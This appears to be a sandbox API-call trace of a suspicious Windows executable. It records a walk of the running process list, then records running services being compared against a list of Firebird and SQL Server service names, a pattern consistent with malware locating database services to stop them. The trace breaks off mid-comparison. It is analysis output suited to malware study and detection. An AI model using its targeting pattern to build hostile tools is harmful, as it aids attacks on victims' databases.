	[0161.767] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0161.768] lstrlenW (lpString="lsass.exe") returned 9
	[0161.768] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0161.768] lstrlenW (lpString="lsm.exe") returned 7
	[0161.768] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0161.768] lstrlenW (lpString="svchost.exe") returned 11
	[0161.768] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0161.769] lstrlenW (lpString="svchost.exe") returned 11
	[0161.769] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0161.769] lstrlenW (lpString="svchost.exe") returned 11
	[0161.769] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0161.769] lstrlenW (lpString="svchost.exe") returned 11
	[0161.769] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0161.770] lstrlenW (lpString="svchost.exe") returned 11
	[0161.770] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0161.770] lstrlenW (lpString="audiodg.exe") returned 11
	[0161.770] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0161.770] lstrlenW (lpString="svchost.exe") returned 11
	[0161.770] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0161.771] lstrlenW (lpString="svchost.exe") returned 11
	[0161.771] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0161.771] lstrlenW (lpString="spoolsv.exe") returned 11
	[0161.771] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0161.771] lstrlenW (lpString="svchost.exe") returned 11
	[0161.771] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0161.772] lstrlenW (lpString="taskhost.exe") returned 12
	[0161.772] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0161.772] lstrlenW (lpString="userinit.exe") returned 12
	[0161.772] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0161.772] lstrlenW (lpString="dwm.exe") returned 7
	[0161.772] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0161.772] lstrlenW (lpString="explorer.exe") returned 12
	[0161.772] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0161.773] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0161.773] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0161.773] lstrlenW (lpString="reader_sl.exe") returned 13
	[0161.773] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="drvinst.exe")) returned 1
	[0161.773] lstrlenW (lpString="drvinst.exe") returned 11
	[0161.773] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0161.774] lstrlenW (lpString="taskhost.exe") returned 12
	[0161.774] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 0
	[0161.774] CloseHandle (hObject=0x37c) returned 1
	[0161.774] Sleep (dwMilliseconds=0x1f4) 
	[0162.458] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0162.458] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0162.458] GetLastError () returned 0xea
	[0162.458] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x113e) returned 0x7ba6360
	[0162.458] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x113e, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0162.459] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0162.459] lstrlenW (lpString="Appinfo") returned 7
	[0162.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0162.459] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0162.459] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0162.459] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0162.459] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0162.459] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0162.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0162.459] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0162.459] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0162.459] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0162.459] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0162.459] lstrlenW (lpString="AudioSrv") returned 8
	[0162.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0162.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0162.460] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0162.460] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0162.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0162.460] lstrlenW (lpString="BFE") returned 3
	[0162.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0162.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0162.460] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0162.460] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0162.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0162.460] lstrlenW (lpString="CryptSvc") returned 8
	[0162.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0162.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0162.460] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0162.460] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0162.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0162.460] lstrlenW (lpString="CscService") returned 10
	[0162.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0162.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0162.460] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0162.460] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0162.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0162.460] lstrlenW (lpString="DcomLaunch") returned 10
	[0162.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0162.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0162.460] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0162.460] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0162.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0162.460] lstrlenW (lpString="Dhcp") returned 4
	[0162.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0162.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0162.460] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0162.460] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0162.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0162.461] lstrlenW (lpString="Dnscache") returned 8
	[0162.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0162.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0162.461] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0162.461] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0162.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0162.461] lstrlenW (lpString="DPS") returned 3
	[0162.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0162.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0162.461] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0162.461] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0162.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0162.461] lstrlenW (lpString="eventlog") returned 8
	[0162.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0162.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0162.461] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0162.461] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0162.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0162.461] lstrlenW (lpString="EventSystem") returned 11
	[0162.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0162.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0162.461] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0162.461] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0162.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0162.461] lstrlenW (lpString="gpsvc") returned 5
	[0162.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0162.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0162.461] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0162.461] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0162.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0162.461] lstrlenW (lpString="iphlpsvc") returned 8
	[0162.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0162.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0162.462] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0162.462] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0162.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0162.462] lstrlenW (lpString="LanmanServer") returned 12
	[0162.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0162.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0162.462] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0162.462] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0162.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0162.462] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0162.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0162.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0162.462] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0162.462] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0162.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0162.462] lstrlenW (lpString="lmhosts") returned 7
	[0162.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0162.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0162.462] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0162.462] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0162.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0162.462] lstrlenW (lpString="MMCSS") returned 5
	[0162.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0162.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0162.462] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0162.462] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0162.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0162.462] lstrlenW (lpString="MpsSvc") returned 6
	[0162.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0162.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0162.463] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0162.463] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0162.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0162.463] lstrlenW (lpString="Netman") returned 6
	[0162.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0162.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0162.463] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0162.463] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0162.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0162.463] lstrlenW (lpString="netprofm") returned 8
	[0162.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0162.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0162.463] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0162.463] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0162.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0162.463] lstrlenW (lpString="NlaSvc") returned 6
	[0162.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0162.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0162.463] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0162.463] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0162.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0162.463] lstrlenW (lpString="nsi") returned 3
	[0162.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0162.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0162.463] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0162.463] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0162.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0162.463] lstrlenW (lpString="PcaSvc") returned 6
	[0162.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0162.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0162.464] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0162.464] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0162.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0162.464] lstrlenW (lpString="PlugPlay") returned 8
	[0162.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0162.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0162.464] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0162.464] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0162.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0162.464] lstrlenW (lpString="Power") returned 5
	[0162.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0162.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0162.464] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0162.464] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0162.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0162.464] lstrlenW (lpString="ProfSvc") returned 7
	[0162.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0162.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0162.464] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0162.464] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0162.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0162.464] lstrlenW (lpString="RpcEptMapper") returned 12
	[0162.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0162.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0162.464] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0162.464] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0162.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0162.464] lstrlenW (lpString="RpcSs") returned 5
	[0162.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0162.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0162.464] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0162.465] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0162.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0162.465] lstrlenW (lpString="SamSs") returned 5
	[0162.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0162.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0162.465] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0162.465] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0162.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0162.465] lstrlenW (lpString="Schedule") returned 8
	[0162.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0162.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0162.465] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0162.465] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0162.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0162.465] lstrlenW (lpString="SENS") returned 4
	[0162.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0162.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0162.465] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0162.465] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0162.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0162.465] lstrlenW (lpString="ShellHWDetection") returned 16
	[0162.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0162.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0162.465] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0162.466] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0162.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0162.466] lstrlenW (lpString="Spooler") returned 7
	[0162.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0162.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0162.466] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0162.466] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0162.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0162.466] lstrlenW (lpString="SysMain") returned 7
	[0162.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0162.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0162.466] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0162.466] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0162.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0162.466] lstrlenW (lpString="Themes") returned 6
	[0162.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0162.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0162.466] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0162.466] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0162.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0162.466] lstrlenW (lpString="TrkWks") returned 6
	[0162.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0162.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
